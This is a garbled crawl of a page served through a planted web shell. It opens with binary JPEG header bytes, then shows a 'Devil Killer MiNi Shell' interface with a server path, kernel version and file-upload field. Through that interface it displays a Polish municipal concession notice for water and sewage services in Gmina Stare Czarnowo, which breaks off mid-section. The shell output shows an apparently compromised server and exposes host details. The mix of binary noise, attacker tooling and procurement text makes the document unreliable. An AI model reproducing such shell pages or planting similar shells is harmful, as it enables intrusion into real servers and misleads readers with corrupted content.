JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191030/1100000197-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 1100000044-N-2019 z dnia 2019-10-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Stare Czarnowo</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_przedmiotu_koncesji_h">WYBÓR PRZEDSIĘBIORSTWA, KTÓRE BĘDZIE ŚWIADCZYĆ USŁUGI ZBIOROWEGO ZAOPATRZENIA W WODĘ I ZBIOROWEGO ODPROWADZANIA ŚCIEKÓW NA TERENIE GMINY STARE CZARNOWO ORAZ OBSŁUGĘ OBIEKTÓW I URZĄDZEŃ WODOCIĄGOWO – KANALIZACYJNYCH ZBIOROWEGO ZAOPATRZENIA W WODĘ I ZBIOROWEGO ODPROWADZANIA ŚCIEKÓW ZLOKALIZOWANYCH NA TERENIE GMINY STARE CZARNOWO W OKRESIE OD 01 STYCZNIA 2020 R. DO 31 GRUDNIA 2022 R.</span><br/> OGŁOSZENIE O KONCESJI - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczenie ogłoszenia jest obowiązkowe</b> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Stare Czarnowo</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">81168485800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Św. Floriana</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">10</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">74-106</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Stare Czarnowo</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">91 485 70 20, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">jjendrzejczak@stareczarnowo.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">91 485 70 60</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://www.stareczarnowo.pl/</span> <br/> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) KOMUNIKACJA: </b> <div style="padding-left: 20px"> Dostęp do dokumentów koncesji można uzyskać pod adresem (URL) (w postępowaniach podzielonych na etapy informację tą można podać w zaproszeniu do składania ofert ) <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_pod_adresem_url">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_pod_adresem_url">http://bip.stareczarnowo.pl/strony/menu/90.dhtml </span> <br /> Część dokumentów koncesji zostanie udostępniona w inny sposób niż za pomocą środków komunikacji elektronicznej z uwagi na szczególne względy techniczne lub związane z bezpieczeństwem (w postępowaniach podzielonych na etapy informację tę można podać w zaproszeniu do składania ofert ): <span id="ctl00_ContentPlaceHolder1_czy_czesc_dokumentow_zostanie_udostepniona">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_czesc_dokumentow_zostanie_udostepniona"></span> </div> <div style="padding-left: 20px"> <b>Oferty/wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br /> <b>Na adres:</b><span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_przeslac_adres">Tak</span> <br /> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_przeslac_adres">Gmina Stare Czarnowo, ul. Św. Floriana 10, 74-106 Stare Czarnowo, pokój nr: 13 sekretariat</span> <br /> <b>Elektronicznie na adres:</b><span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_przeslac_elektronicznie">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_przeslac_elektronicznie"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT UMOWY KONCESJI </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1 Nazwa: </b> <br /> <span id="ctl00_ContentPlaceHolder1_nazwa_przedmiotu_koncesji">WYBÓR PRZEDSIĘBIORSTWA, KTÓRE BĘDZIE ŚWIADCZYĆ USŁUGI ZBIOROWEGO ZAOPATRZENIA W WODĘ I ZBIOROWEGO ODPROWADZANIA ŚCIEKÓW NA TERENIE GMINY STARE CZARNOWO ORAZ OBSŁUGĘ OBIEKTÓW I URZĄDZEŃ WODOCIĄGOWO – KANALIZACYJNYCH ZBIOROWEGO ZAOPATRZENIA W WODĘ I ZBIOROWEGO ODPROWADZANIA ŚCIEKÓW ZLOKALIZOWANYCH NA TERENIE GMINY STARE CZARNOWO W OKRESIE OD 01 STYCZNIA 2020 R. DO 31 GRUDNIA 2022 R.</span> <br/> <b>Numer referencyjny: </b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RO.271.10.2019.JJ</span> <br/> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>Umowa koncesji będzie finansowana ze środków pochodzących z projektu/programu Unii Europejskiej: </b><span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> <br /> Nazwa i numer projektu/programu: <br /> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.2 Rodzaj umowy koncesji:</b> <br />Roboty budowlane: <span id="ctl00_ContentPlaceHolder1_rodzaj_umowy_koncesji_rb"></span> <br />Usługi: <span id="ctl00_ContentPlaceHolder1_rodzaj_umowy_koncesji_uslugi">Tak</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.3 Informacja o częściach:</b> <br /> <b>Przedmiot umowy koncesji podzielony jest na części:</b><span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br /> <b>Oferty można składać w odniesieniu do:</b> <br /> <span id="ctl00_ContentPlaceHolder1_oferty_w_odniesieniu_do"></span> <br /> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br /> <b>Maksymalna liczba części przedmiotu umowy koncesji, w których umowa może być zawarta z tym samym wykonawcą</b><span id="ctl00_ContentPlaceHolder1_czy_maksymalna_liczba_czesci_moze_byc_zawarta">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_moze_byc_zawarta">0</span> <br /> <b>Zamawiający zastrzega sobie prawo do zawarcia umowy koncesji łącznie w odniesieniu do następujących części lub grup części </b><span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_zastrzega_prawo_do_zawarcia_umowy">Nie</span> <br /> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_zastrzega_prawo_do_zawarcia_umowy"></span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.4 Krótki opis przedmiotu umowy koncesji:</b><i>(wielkość lub zakres usług lub robót budowlanych, a w przypadku, gdy przedmiot umowy koncesji nie jest dzielony na części także rodzaj i ilość robót budowlanych lub usług lub określenie zapotrzebowania i wymagań, o których mowa w art. 26 ust. 1 i 2 ustawy o umowie koncesji): </i> <br /> <span id="ctl00_ContentPlaceHolder1_krotki_opis_umowy_koncesji">1. Przedmiotem zamówienia jest realizacja usługi zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków na terenie gminy Stare Czarnowo oraz obsługę obiektów i urządzeń wodociągowo – kanalizacyjnych zbiorowego zaopatrzenia w wodę i zbiorowego odprowadzania ścieków na terenie gminy Stare Czarnowo w okresie od 01 stycznia 2020 roku do 31 grudnia 2023 roku.2. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1 do niniejszej SIWZ: „Szczegółowym opisie przedmiotu zamówienia”, załączniku nr 2 do niniejszej SIWZ: „Naprawy i nakłady” oraz załączniku nr 4 do niniejszej SIWZ: „Wzór umowy koncesji”. </span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.5 Główny kod CPV:</b><span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90713000-8</span> <br/> <b>Dodatkowe kody CPV:</b><i>(jeżeli dotyczy)</i> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>65100000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>51514110-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>50411100-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>65130000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>65111000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>65110000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90000000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90410000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90420000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90430000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90470000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90480000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90481000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90490000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90491000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90492000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90640000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90641000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90642000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90713100-9</TD></TR></TABLE> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.6 Szacunkowa wartość umowy koncesji:</b><i>(jeżeli dotyczy)</i>: <br/> <b>Wartość bez VAT:&#160;</b> <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_umowy"></span> &#160;&#160;<b>Waluta:</b>&#160; <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_umowy_waluta"></span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.7 Okres obowiązywania umowy koncesji</b>: <br/> <b>Okres w miesiącach:</b><span id="ctl00_ContentPlaceHolder1_okres_miesiacach"></span><b> lub dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_dniach"></span> <br /> lub <br /> <b>data rozpoczęcia:</b><span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span><b> lub zakończenia:</b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2022-12-31</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.8 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br/> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe">Termin realizacji zamówienia: od 01.01.2020 r. do 31.12.2022 r.</span> <br /> </div> </div> <br /> <br /> <div class="headerLarge_xforms" style="text-align: center"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE EKONOMICZNYM, FINANSOWYM, TECHNICZNYM I ZAWODOWYM ORAZ PODSTAWY WYKLUCZENIA Z POSTĘPOWANIA O ZAWARCIE UMOWY KONCESJI </u> </div> <br /> <b>III.1. KRYTERIA KWALIFIKACJI DO UDZIAŁU W POSTĘPOWANIU</b> <br /> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.1.1 Kryteria dotyczące sytuacji finansowej lub ekonomicznej</b><i>(jeżeli dotyczy)</i>: <br/> Wykaz kryteriów kwalifikacji wraz z krótkim opisem oraz ze wskazaniem minimalnego poziomu spełniania kryterium, jeżeli jest wymagany: <br /> <span id="ctl00_ContentPlaceHolder1_kryteria_III_1_1">Opis spełnienia warunku w zakresie sytuacji ekonomicznej lub finansowej: o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy udokumentują, że znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia lub polegają na zdolnościach finansowych innych podmiotów w tym zakresie, tj.: posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200.000,00 zł.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.1.2 Kryteria dotyczące zdolności technicznej lub zawodowej</b><i>(jeżeli dotyczy)</i>: <br/> Wykaz kryteriów wraz z krótkim opisem oraz ze wskazaniem minimalnego poziomu spełniania kryterium, jeżeli jest wymagany: <br /> <span id="ctl00_ContentPlaceHolder1_kryteria_III_1_2">1.1.1	Opis spełnienia warunku: o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:1.1.1 a) UPRAWNIENIA: posiadają zezwolenie lub przyrzeczenie wydania zezwolenia (promesę) na prowadzenie zbiorowego zaopatrzenia w wodę oraz zbiorowego odprowadzania ścieków, o którym mowa w art. 16 punkt 1 ustawy o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków (Dz. U z 2019, poz. 1437t.j.- zwaną dalej „uzwzoś”), co najmniej na okres objęty przedmiotem umowy koncesji.Uwaga: powyższy wymóg nie dotyczy podmiotów wymienionych w art. 16 ust. 3 ustawy uzwzoś ;1.1.1 b) DOŚWIADCZENIE: w okresie ostatnich siedmiu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali należycie lub wykonują należycie co najmniej dwie usługi o charakterze ciągłym trwające przez okres 24 miesięcy w ramach jednego kontraktu lub umowy, polegającą na (zawierającego wszystkie niżej wymienione elementy):ba) jednoczesnej eksploatacji i konserwacji minimum 3 (trzech) obiektów stacji wodociągowych wraz z ujęciami wody o wielkości produkcji wody wyrażonej wielkością rocznej sprzedaży wody co najmniej w ilości 250 m³/dobę odrębnie dla każdego z nich; bb) jednoczesnej eksploatacji i konserwacji minimum 3 (trzech) obiektów oczyszczalni ścieków wraz z obsługującym je urządzeniami i siecią kanalizacji sanitarnej;bc) eksploatacji i konserwacji sieci wodociągowych i/lub kanalizacyjnych, o łącznej długości 20 km (słownie: dwadzieścia kilometrów);bd) wystawianiu faktur /rachunków oraz pobór opłat za zużycie wody, stanowiących przychód Wykonawcy, obejmujących minimum 1000 przyłączy (jeden tysiąc), wraz z zawieraniem umów z odbiorcami wody we własnym imieniu.1.1.1 c) POTENCJAŁ KADROWY: Opis spełnienia warunku w zakresie dysponowania osobami zdolnymi do wykonania przedmiotu umowy koncesji, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnymi za realizację umowy tj. co najmniej:a)	1 (jedną) osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci wodociągowych, kanalizacyjnych lub innych uprawniających do realizacji usługi stanowiącej przedmiot umowy koncesji, zgodnie z treścią decyzji o ich nadaniu z uwzględnieniem przepisów stanowiących podstawę ich nadania, umożliwiające kierowanie, nadzorowanie i kontrolowanie robót w zakresie sieci wodociągowych i kanalizacyjnych; b)	1 (jedną) osobą posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci wodociągowych, kanalizacyjnych innych uprawniających do realizacji usługi stanowiącej przedmiot umowy koncesji, zgodnie z treścią decyzji o ich nadaniu z uwzględnieniem przepisów stanowiących podstawę ich nadania, umożliwiające uzgadnianie dokumentacji projektowej, wydawanie warunków technicznych przyłączenia do ww. sieci, odbiory techniczne sieci i urządzeń w zakresie sieci wodociągowych i kanalizacyjnych; c)	1 (jedną) osobą (technolog) posiadającą wykształcenie wyższe w zakresie inżynierii sanitarnej/technologii uzdatniania wody i oczyszczania ścieków/ ochrony środowiska lub pokrewne posiadającą minimum 3 letnie doświadczenie w obsłudze i eksploatacji publicznych stacji uzdatniania wody i oczyszczalni ścieków; d) 3 osobami do bezpośredniej obsługi obiektów stacji uzdatniania wody, oczyszczalni ścieków i przepompowni, urządzeń i sieci wodociągowo - kanalizacyjnych;UWAGA: Zamawiający dopuszcza łączenie funkcji dla lit. a, b i c.1.1.1d) NARZĘDZIA: Opis spełnienia warunku w zakresie dysponowania odpowiednimi urządzeniami technicznymi oraz środkami organizacyjno–technicznymi:o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponowali niezbędnymi do wykonania zamówienia narzędziami i urządzeniami tj. co najmniej:a)	- urządzeniem do udrażniania kanalizacji – 1 sztb)	- wozem asenizacyjnym 1 sztc)	- beczkowozem do przewozu wody pitnej 1 szt.</span> <br /> Umowa koncesji jest zastrzeżona dla zakładów pracy chronionej oraz wykonawców, których głównym celem jest społeczna i zawodowa integracja osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych albo w rozumieniu właściwych przepisów państw członkowskich Europejskiego Obszaru Gospodarczego lub osób defaworyzowanych: &#160;&#160; <span id="ctl00_ContentPlaceHolder1_czy_umowa_koncesji_zastrzezona">Nie</span> <br /> Minimalny wskaźnik zatrudnienia osób niepełnosprawnych lub defaworyzowanych wynosi:<span id="ctl00_ContentPlaceHolder1_III_1_2_Procent"></span>% osób zatrudnionych przez zakłady pracy chronionej lub wykonawców, których głównym celem jest społeczna i zawodowa integracja osób niepełnosprawnych </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.1.3 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_III_1_3">W celu spełnienia kryteriów kwalifikacji wykonawca może, w stosownych przypadkach i w odniesieniu do konkretnej umowy koncesji, polegać na zdolnościach innych podmiotów, bez względu na charakter prawny związków łączących go z tymi podmiotami. W odniesieniu do kryteriów kwalifikacji zdolności technicznej i zawodowej w części doświadczenie, Wykonawca może polegać na zdolnościach innego podmiotu udostępniającego w celu spełnienia kryteriów kwalifikacji, jeśli podmiot ten będzie brał udział faktyczny w realizacji zamówienia.</span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.2 PODSTAWY WYKLUCZENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>Zamawiający przewiduje wykluczanie wykonawców z postępowania o zawarcie umowy koncesji w oparciu o podstawy wykluczenia określone w art. 32 ust. 1 ustawy o umowie koncesji</b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_wykluczenia_III_2_1">Tak</span> <br />Podstawy, w oparciu o które wykonawcy będą wykluczani z postępowania <i>(należy wypełnić w przypadku, gdy zamawiający przewiduje wykluczanie wykonawców w oparciu o podstawy wykluczenia określone w art. 32 ust. 1 ustawy o umowie koncesji)</i>: <br /><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit a ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1a">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit. b ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1b">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit. c ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1c">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 1 lit. d ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_1d">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 2 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_2">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 3 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_3">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 4 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_4">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 5 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_5">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 6 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_6">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 7 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_7">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 8 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_8">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 9 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_9">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 10 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_10">Tak</span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>III.2.2 Podstawy wykluczenia określone w art. 32 ust. 2 ustawy o umowie koncesji</b> <br/> <b>Zamawiający przewiduje wykluczanie wykonawców z postępowania o zawarcie umowy koncesji na podstawie art. 32 ust. 2 ustawy o umowie koncesji</b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_wykluczenia_III_2_2">Tak</span> <br /> Podstawy, w oparciu o które wykonawcy będą wykluczani z postępowania <i> (należy wypełnić w przypadku, gdy zamawiający przewiduje wykluczanie wykonawców w oparciu o podstawy wykluczenia określone w art. 32 ust. 2 ustawy o umowie koncesji)</i>: <br />podstawa wykluczenia określona w art. 32 ust. 2 pkt 1 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_1">Tak</span><br /> 